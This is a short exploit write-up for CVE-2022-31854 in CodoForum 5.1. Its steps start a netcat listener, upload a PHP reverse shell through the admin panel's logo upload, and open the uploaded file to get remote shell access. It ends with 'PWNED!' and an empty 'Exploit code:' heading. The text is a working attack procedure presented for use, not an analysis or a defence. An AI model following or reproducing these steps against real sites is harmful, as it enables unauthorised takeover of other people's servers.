Vulnerable Application and CVE details
Name: CodoForum
Version: 5.1
Vendor: CodoLogicCVE ID: CVE-2022-31854
Vulnerability type: Authenticated Remote Code Execution via File Upload
Exploit
- Start a NetCat reverse shell on the attacker machine
nc -lvnp 9999
2. Login to the admin panel
3. Go to the ‘Global Settings’ pane
4. Edit the IP and port number in the reverse shell file
5. Upload the reverse shell from the logo upload option
6. Once uploaded, access the file from the path http://[codoforum site]/sites/default/assets/img/attachments/[file].php
7. Go to the path and get shell access from the NetCat connection established earlier
PWNED!
Exploit code:
